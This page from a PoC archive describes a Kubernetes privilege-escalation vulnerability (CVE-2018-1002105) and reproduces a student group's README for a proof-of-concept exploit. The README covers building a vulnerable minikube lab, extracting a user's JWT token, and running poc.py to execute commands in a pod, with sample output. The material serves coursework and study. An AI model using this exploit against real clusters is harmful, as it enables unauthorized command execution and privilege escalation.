关联漏洞
标题:Google Kubernetes 权限许可和访问控制漏洞 (CVE-2018-1002105)Description:Google Kubernetes是美国Google公司的一套开源的Docker容器集群管理系统。该系统为容器化的应用提供资源调度、部署运行、服务发现和扩容缩容等功能。 Google Kubernetes 1.10.11之前版本、1.11.5之前版本和1.12.3之前版本中存在提权漏洞,该漏洞源于程序没有正确的处理错误响应。攻击者可通过发送特制的请求利用该漏洞部署恶意代码或修改现有服务。
介绍
# CMPT733-Group11(0x90)
### CVE-2018-1002105
__Members__: Abhishek Rungta, Shubham Saini, Siddhant Sood
# Environment Setup
* A linux VM (Such as Ubuntu 20.04)
* Minikube for local deploymnet of kubernetes
* Any of these older versions(1.0.x— 1.9.x, 1.10.0—1.10.10,1.11.0—1.11.4,1.12.0—1.12.2)
# Run the exploit
We have provided a virtual box image (.ova file)
Download it and create a VM from it.
The ova provided is pre configured with docker v18.09 and minikube v1.9.0
[OVA link](https://drive.google.com/file/d/1sK7vb8ijzqo971J5ofyScwQBvgaOGogm/view?usp=sharing)
#### Build the kubernetes cluster
As our virtual image already has minkube and the required kubernetes versions just run the following command to start minikube
~~~
minikube start --kubernetes-version=v1.12.2
~~~
#### Create new user, namespace and assign role
Create a new user and a namespace and assign RBAC role to the user created using the followig command.
~~~
kubectl apply -f fixing_policy.yml
~~~
#### Remove access to conntract
~~~
kubectl edit configmaps kube-proxy --namespace=kube-system
~~~
Change the set maxPerCore to 0
#### Get the JWT token
First run the following command to get all the jwt tokens stored in the system
~~~
kubectl get secrets -A
~~~
To get the secret of the particular user created run the following command:
~~~
kubectl -n [namespace] get secrets [user-token] -o json
~~~
Then base64 decode it.
~~~
export TOKEN=$(echo TOKEN | base64 -d)
echo $TOKEN
~~~
#### Get the IP address and port No.
~~~
kubectl cluster-info
~~~
#### To deploy the pod
~~~
kubectl run --image=nginx:alpine securenginx -n poc
~~~
#### Run the POC
Specify all the required arguments:\
-t for the target> ip:port (required)\
-j for the JWT token of the user (required)\
-p for pod (required)\
-n for the namespace\
-m for the method (required)\
-c for the container\
-x for the attacker command
#### Test case
Input
~~~
./poc.py -t [IP:Port] -j [token] -p [pod] -n [namespace] -m attach -x "command"
~~~
~~~
./poc.py -t 127.0.0.1:32768 -j $TOKEN -p securenginx -m attach -n poc -x "ifconfig eth0"
~~~
Output
~~~
eth0 Link encap:Ethernet HWaddr 02:42:AC:11:00:02
inet addr:172.17.0.2 Bcast:172.17.255.255 Mask:255.255.0.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1313 errors:0 dropped:0 overruns:0 frame:0
TX packets:1224 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:217603 (212.5 KiB) TX bytes:428778 (418.7 KiB)
{"metadata":{},"status":"Success"}
~~~
# Video Demo
Demo video [link](
https://youtu.be/NKioO9UwwAw
)
文件快照
[4.0K] /data/pocs/0ba6502332962137e49e7c39113aa95578a1718f
├── [ 220] exec_cmds
├── [ 713] fixing_policy.yml
├── [1.0K] LICENSE
├── [5.0K] poc.py
├── [2.6K] README.md
├── [ 9] requirements.txt
└── [ 127] upgrade_req
0 directories, 7 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。